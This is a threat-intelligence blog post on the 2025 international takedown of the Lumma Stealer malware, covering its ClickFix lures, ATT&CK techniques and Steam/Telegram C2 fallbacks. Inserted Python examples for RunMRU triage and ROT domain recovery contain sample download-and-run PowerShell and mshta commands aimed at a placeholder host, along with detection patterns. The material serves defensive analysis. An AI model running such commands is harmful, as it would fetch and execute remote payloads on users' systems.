Disrupting Lumma Stealer Malware – Microsoft Leads Global Action
Originally surfacing in 2022, LummaC2 continues to be distributed via spear phishing emails, malicious links, and spoofed software downloads. In some campaigns, attackers employed fake CAPTCHA challenges (the so-called ClickFix lure) to deceive users into triggering malware execution themselves: the victim is told to open the Windows Run dialog and paste a short command, which launches a hidden PowerShell payload. The malware’s stealth-focused design allows it to operate largely in memory and evade detection by many traditional endpoint solutions.
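The Run-dialog lure above leaves a durable trace on the host: whatever the victim pastes into Win+R is recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. The Python below is an added triage example, not code from this article or from Microsoft or CISA. It parses a constructed RunMRU export (the values and their MRUList ordering follow the layout Windows uses, with a trailing "\1" on each entry) and flags entries that pair a living-off-the-land binary with a hidden window, an encoded command, a download cradle, an execution-policy bypass or a remote URL. The sample values, the binary list, the indicator patterns and the scoring rule are assumptions chosen for illustration.

```python
import re
from typing import Dict, List

# Constructed RunMRU export, NOT real telemetry. Windows stores each Run-dialog entry
# as the typed command followed by "\1"; MRUList lists the keys most-recent-first.
SAMPLE_RUNMRU: Dict[str, str] = {
    "a": r"notepad\1",
    "b": r'powershell -w hidden -c "iex (irm https://example.invalid/verify)"\1',
    "c": r"cmd /c whoami\1",
    "d": r"mshta https://example.invalid/captcha.hta\1",
    "MRUList": "dbca",
}

# Binaries a ClickFix-style lure typically asks the victim to run (assumed list).
LOLBINS = re.compile(
    r"\b(powershell|pwsh|mshta|cmd|wscript|cscript|rundll32|regsvr32|curl|certutil)(\.exe)?\b",
    re.I,
)

# Secondary indicators; a bare LOLBin such as "cmd /c whoami" is not flagged on its own.
INDICATORS = {
    "hidden_window":   re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I),
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "download_cradle": re.compile(
        r"\b(iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b",
        re.I,
    ),
    "remote_url":      re.compile(r"https?://", re.I),
    "policy_bypass":   re.compile(r"-e(xecutionpolicy)?p?\s+bypass", re.I),
}


def parse_runmru(values: Dict[str, str]) -> List[str]:
    """Return the typed commands in MRUList (most-recent-first) order, trailing "\\1" removed."""
    commands = []
    for key in values.get("MRUList", ""):
        raw = values.get(key)
        if raw is None:
            continue
        commands.append(raw[:-2] if raw.endswith("\\1") else raw)
    return commands


def score_command(command: str) -> Dict[str, object]:
    """Flag a command when it names a LOLBin AND shows at least one ClickFix indicator."""
    lolbin = LOLBINS.search(command)
    hits = [name for name, rx in INDICATORS.items() if rx.search(command)]
    return {
        "command": command,
        "lolbin": lolbin.group(1).lower() if lolbin else None,
        "indicators": hits,
        "suspicious": bool(lolbin) and bool(hits),
    }


def analyze_runmru(values: Dict[str, str]) -> List[Dict[str, object]]:
    """Score every RunMRU entry; the first result is the most recently typed command."""
    return [score_command(c) for c in parse_runmru(values)]


if __name__ == "__main__":
    for finding in analyze_runmru(SAMPLE_RUNMRU):
        flag = "SUSPICIOUS" if finding["suspicious"] else "ok"
        print(f"{flag:10} {finding['lolbin'] or '-':10} {finding['indicators']}  {finding['command']}")
```

On a live host the same logic would be fed from the user hives (for example via Python's winreg module or a registry export collected by your forensic tooling); RunMRU survives the PowerShell process exiting, which is what makes it useful when the payload itself never touched disk.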
LummaC2’s functionality includes browser data theft, credential harvesting, crypto wallet extraction, and even the capture of multifactor authentication tokens. Once executed, the malware establishes contact with its command-and-control servers, retrieves encrypted JSON instructions, and runs a series of modular commands. These include data theft, file downloads, screenshots, and even self-deletion routines to erase traces from infected systems.
Understanding the Threat of Lumma
LummaC2 Stealer, first observed in 2022, emerged as a top-tier Malware-as-a-Service (MaaS) tool. Developed by a Russian-based actor known as “Shamel,” Lumma was sold through subscription tiers ranging from $250 to $1,000 per month, with source code access offered at $20,000. The operation included Gitbook-hosted documentation that lowered the barrier for less skilled cybercriminals.
Lumma was distributed through phishing emails, malvertising, and spoofed software downloads. Microsoft observed a major campaign in March 2025 impersonating Booking.com, which used fake reservation emails to deliver it and other stealers. Groups like Octo Tempest (Scattered Spider) relied on the stealer to harvest credentials before launching ransomware attacks against high-value targets in finance, healthcare, and education.
Timeline of Events
| Date | Event |
| --- | --- |
| Late 2022 | LummaC2 appears on Russian-speaking forums as a Malware-as-a-Service offering |
| Nov 2023 | Developer “Shamel” claims 400 active clients in an interview |
| Apr – Jun 2024 | 21,000+ LummaC2 log listings appear on dark web forums |
| Mar 2025 | LummaC2 used in a phishing campaign impersonating Booking.com |
| Mar – May 2025 | Microsoft identifies over 394,000 Windows infections caused by LummaC2 |
| May 13, 2025 | Microsoft files legal action; DOJ seizes control panel domains |
| May 15, 2025 | Operators attempt to restore service; 3 new domains are spun up and seized again |
| May 16, 2025 | Coordination with Europol and JC3 completes the disruption of remaining infrastructure |
| May 21, 2025 | Public announcement of the takedown; FBI takes over a Lumma Telegram channel |
Microsoft Files Legal Action Against Lumma
On May 13, 2025, Microsoft’s Digital Crimes Unit (DCU), backed by international law enforcement and cybersecurity vendors, launched a major operation to dismantle the infrastructure behind Lumma Stealer – a widely abused infostealer malware strain used by threat actors worldwide. Supported by a court order from the U.S. District Court for the Northern District of Georgia, the DCU worked with the Department of Justice, Europol, and other global partners to take down Lumma’s technical infrastructure.

Seizure notice displayed on a domain taken over by Microsoft (Source: Microsoft)
The operation led to the seizure and redirection of over 2,300 malicious domains that formed Lumma’s communication backbone. Microsoft sinkholed more than 1,300 of these domains, severing control from infected systems while enabling telemetry to monitor callbacks and assist in broader threat intelligence.
FBI and CISA Issue Technical Advisory
Following Microsoft’s disruption operation, the FBI and CISA released a joint advisory on May 21, 2025, detailing continued exploitation of LummaC2 malware by threat actors targeting U.S. critical infrastructure sectors. The advisory confirms that the malware remains active in the wild, with infections observed as recently as May 2025.
Technically, Lumma operated largely in memory and left few artifacts on disk. It contacted command-and-control (C2) domains to retrieve encrypted JSON instructions, which enabled it to exfiltrate browser data, session tokens, MFA credentials, and cryptocurrency wallet information. The advisory noted over 21,000 LummaC2 log listings on criminal marketplaces in Q2 2024, reflecting the malware’s widespread deployment.
Technical Insights from the Advisory
CISA’s report maps LummaC2 behavior to MITRE ATT&CK techniques, emphasizing its ability to bypass defenses via obfuscation and masquerading. Notably, the malware uses APIs like GetUserNameW and GetComputerNameW for initial system identification. If certain hardcoded values are matched, execution halts – a likely safeguard to avoid running on the attacker’s own machines.
Otherwise, the malware proceeds to retrieve and parse configuration files from its C2 domains. These files instruct the malware on what data to collect or what further actions to perform. LummaC2 supports command options to specify file types, paths, maximum sizes, and custom targets. It even distinguishes between browsers for targeted data extraction, including special handling for Mozilla-based browsers.
MITRE ATT&CK TTPs Associated with LummaC2 Malware
The following table highlights the tactics and techniques used by LummaC2 operators as identified by CISA and the FBI. Each entry is mapped to the MITRE ATT&CK for Enterprise framework, offering insight into how the malware achieves access, evasion, data theft, and communication.
| Tactic | Technique | ID | Description |
| --- | --- | --- | --- |
| Initial Access | Phishing | T1566 | Used phishing emails to deliver LummaC2 payloads. |
| Initial Access | Phishing: Spearphishing Attachment | T1566.001 | Delivered malware via malicious attachments. |
| Initial Access | Phishing: Spearphishing Link | T1566.002 | Delivered the payload through links embedded in phishing emails. |
| Execution | Native API | T1106 | Executed downloaded files using Windows native APIs (e.g., rundll32.exe or LoadLibrary). |
| Defense Evasion | Obfuscated Files or Information | T1027 | Obfuscated the malware to evade detection by EDR and antivirus tools. |
| Defense Evasion | Masquerading | T1036 | Disguised payloads as legitimate software. |
| Defense Evasion | Deobfuscate/Decode Files or Information | T1140 | Decoded C2 domains at runtime to bypass static analysis. |
| Discovery | Query Registry | T1012 | Queried system information via Windows APIs. |
| Discovery | Browser Information Discovery | T1217 | Targeted and harvested browser data and extensions. |
| Collection | Automated Collection | T1119 | Stole stored credentials, crypto wallets, and authentication tokens. |
| Command and Control | Application Layer Protocol: Web Protocols | T1071.001 | Used encrypted HTTP POST requests to communicate with C2 servers. |
| Command and Control | Ingress Tool Transfer | T1105 | Downloaded additional files onto the infected host. |
| Exfiltration | Exfiltration (tactic-level; TA0010 is the tactic identifier, not a technique) | TA0010 | Exfiltrated sensitive data including credentials and MFA secrets. |
For related IOCs and file hashes, refer to the official CISA advisory.
Inside LummaC2: Engineering a Malware Empire
LummaC2’s rapid rise and sustained dominance in the malware-as-a-service space was powered by its highly engineered, evasive architecture. Built in C/C++, the malware relied on control flow flattening, XOR string obfuscation, and MurmurHash2-based API hashing – all techniques aimed at complicating static analysis and thwarting automated detection systems. To avoid sandbox environments and dynamic analysis, Lumma included anti-sandbox logic that delayed execution until it detected human interaction, such as mouse movement.
Its command-and-control infrastructure was equally resilient. Lumma cycled through nine hardcoded primary domains and, if those failed, fell back to obfuscated Steam profile URLs using a simple ROT cipher for domain encoding. A tertiary layer relied on Telegram channels to sustain access, a method increasingly seen in modern malware families. Cloudflare infrastructure was also exploited to hide the true origin of Lumma’s backend systems, helping the operators mask their data collection servers behind proxy protections.
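The Steam fallback described above can be reproduced offline. The Python below is an added example, not Lumma’s own code or tooling from the article or the advisory. It extracts a persona name from a constructed fragment of a Steam profile page (the `actual_persona_name` element and the sample HTML are assumptions), brute-forces all 25 ROT shifts because an analyst does not know the shift in advance, keeps only decodings shaped like a domain with a plausible TLD, and then orders the recovered domain behind the hardcoded primaries and ahead of the Telegram tier as the text describes. The shift used to build the sample (11), the placeholder primary domains and the TLD list are illustrative, not the real values.

```python
import re
import string
from typing import List, Tuple

LOWER = string.ascii_lowercase

# Constructed fragment of a Steam profile page (assumption: the persona name sits in a
# span with class "actual_persona_name"). The name is rot("c2fallback.example.net", 11).
SAMPLE_STEAM_HTML = (
    '<html><body><div class="profile_header">'
    '<span class="actual_persona_name">n2qlwwmlnv.pilxawp.ype</span>'
    '</div></body></html>'
)

# Illustrative TLDs a decoded fallback domain is allowed to end in (assumption).
PLAUSIBLE_TLDS = {"com", "net", "org", "top", "xyz", "shop", "site", "info", "online", "cyou"}
DOMAIN_RX = re.compile(r"^[a-z0-9-]+(\.[a-z0-9-]+)+$")
PERSONA_RX = re.compile(r'<span class="actual_persona_name">\s*([^<]+?)\s*</span>')


def rot(text: str, shift: int) -> str:
    """Caesar/ROT shift over a-z only; digits, dots and hyphens pass through unchanged."""
    out = []
    for ch in text.lower():
        if ch in LOWER:
            out.append(LOWER[(LOWER.index(ch) + shift) % 26])
        else:
            out.append(ch)
    return "".join(out)


def extract_persona(html: str) -> str:
    """Pull the persona name out of a profile page; empty string if it is not present."""
    m = PERSONA_RX.search(html)
    return m.group(1) if m else ""


def recover_domain(persona: str) -> List[Tuple[int, str]]:
    """Try every shift 1..25 and keep decodings shaped like a domain with a plausible TLD."""
    persona = persona.strip().lower()
    hits = []
    for shift in range(1, 26):
        candidate = rot(persona, -shift)
        if DOMAIN_RX.match(candidate) and candidate.rsplit(".", 1)[-1] in PLAUSIBLE_TLDS:
            hits.append((shift, candidate))
    return hits


def c2_candidates(primary: List[str], steam_html: str, telegram_channel: str) -> List[str]:
    """C2 sources in the order the text describes: hardcoded domains, then the domain
    hidden in the Steam profile name, then the Telegram tier."""
    steam_tier = [d for _, d in recover_domain(extract_persona(steam_html))]
    return list(primary) + steam_tier + [telegram_channel]


if __name__ == "__main__":
    primaries = ["primary1.example", "primary2.example"]  # placeholders, not real C2
    for src in c2_candidates(primaries, SAMPLE_STEAM_HTML, "t.me/example_channel"):
        print(src)
```

Filtering on a TLD list rather than accepting the first shift that "looks right" matters in practice: every shift of a dotted string still parses as a host name, so without the filter the brute force returns 25 candidates instead of one. For a real sample, extend the TLD list from the primary domains you already have from the config.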
Global Coordination and the Role of Europol, Cloudflare, and Industry
While LummaC2’s technical complexity made it difficult to contain, its demise was eventually orchestrated by a global response. The disruption was initiated by Microsoft’s Digital Crimes Unit, which filed legal action and seized more than 2,300 domain names. Europol worked with law enforcement agencies throughout Europe to ensure that infrastructure hosted in the EU was taken offline and that investigations did not conflict.
The US Department of Justice seized several control panel domains used by Lumma’s operators. When the operators tried to recover by registering new domains within 48 hours, those were identified and seized as well. Simultaneously, Japan’s JC3 led infrastructure takedowns in Asia, rounding out a disruption that spanned the U.S., Europe, and Asia.
Cloudflare’s Cloudforce One and Trust & Safety teams also played a critical role. Lumma Stealer had been abusing Cloudflare’s services to conceal the origins of its malware command infrastructure and marketplace. In response, Cloudflare suspended the malicious customer accounts and added Turnstile verification to its interstitial warning page, which stopped the malware from automatically clicking through the warning and reaching its backend. Additionally, Cloudflare worked with Microsoft and multiple domain registrars to ensure that Lumma’s operators couldn’t simply reconfigure DNS settings and regain control of seized domains.

Cloudflare’s enhanced interstitial warning page with Turnstile verification (Source: Cloudflare)
Security researchers from Bitsight’s TRACE team contributed to the broader takedown by helping identify over 1,000 malicious domains, 90+ Telegram channels, and multiple Steam profiles linked to Lumma’s fallback communication network.
What made this operation unique wasn’t just its scale but its synchronization. The collaborative response targeted every layer of Lumma’s infrastructure – its control panels, communication backbones, monetization methods, and data delivery channels – neutralizing both its frontend and backend capabilities in one strategic sweep.
Aftermath and Messaging: FBI Takes Over Lumma’s Channels
As the final blow to LummaC2’s public presence, the FBI took control of at least one of Lumma’s Telegram channels, replacing its content with a striking message directed at the malware’s subscribers. The post featured Lumma’s bird logo behind bars, symbolizing the takedown of the operation and the accountability of its operators.

FBI seizure notice posted in a LummaC2 Telegram channel (Source: X)
The message confirmed that Lumma’s infrastructure had been seized and that subscriber access was permanently revoked. It also emphasized that user logs and account information were now in the hands of U.S. authorities. In a tone both assertive and clear, the FBI noted that “your administrator didn’t protect you,” highlighting how quickly the operation folded despite its perceived resilience.
The post concluded with multiple contact options for affected individuals – including Telegram, Signal, and a dedicated email ([email protected]) – implying that outreach from law enforcement is far from over. The tone made clear that not only was the infrastructure dismantled, but the entire user ecosystem is now under scrutiny.
This kind of public-facing messaging represents a psychological tactic aimed at eroding trust in threat actors. It sends a warning to both users and developers: no service is untouchable, and takedowns can come with visible, lasting consequences.
Lessons for the Future
LummaC2 is a case study in the evolution of malware – from simple credential stealers to full-blown platforms with corporate-style customer support and fallback mechanisms. Its demise offers key takeaways:
- Redundancy is standard: Single-layer defenses are no longer enough
- Legitimate services are abused: Steam and Telegram were fallback channels
- Partnerships are powerful: Private-public collaboration was essential to this success
Uncover Hidden Threats with SOCRadar’s Malware Analysis
Malware threats are increasingly complex, evasive, and adaptable. Detecting them is only the first step; understanding how they work allows for effective defense.

SOCRadar’s Malware Analysis feature
SOCRadar’s Malware Analysis feature, which is part of the larger SOCRadar Cyber Threat Intelligence (CTI) module, allows security teams to analyze suspicious files in a controlled environment, revealing the true behavior and intent of malicious code. Whether dealing with unknown payloads, evasive droppers, or heavily obfuscated binaries, the module helps answer critical questions:
- What systems or data does the malware target?
- How does it execute, persist, and communicate?
- Which defensive techniques does it attempt to bypass?
From Threat Actor Monitoring and Vulnerability Intelligence to Dark Web Intelligence and Tactical IOC feeds, SOCRadar CTI offers an integrated platform for understanding and defending against the full cybercrime lifecycle. The platform connects telemetry from stealer logs, ransomware groups, phishing kits, and threat campaigns to help you stay ahead of attackers.
Whether you’re triaging a new incident, mapping infrastructure reuse, or proactively monitoring for emerging threats, SOCRadar gives you the context and tools to act fast – and act smart.
Conclusion
The dismantling of LummaC2 represents a rare and meaningful disruption in the cybercrime landscape. It underscores the growing capability of public-private coalitions to bring down even the most resilient and widely used malware infrastructures. While LummaC2 is no longer operational, its tactics, codebase, and business model may resurface in future malware strains.
For defenders, the key takeaway isn’t just that Lumma was stopped – it’s how. Cooperation, telemetry, legal frameworks, and global reach combined to deliver one of the most successful takedowns in recent memory. It’s a reminder that while threat actors move fast, defenders can strike harder – especially when united.
Article Link: https://socradar.io/disrupting-lumma-stealer-malware-microsoft-leads-global-action/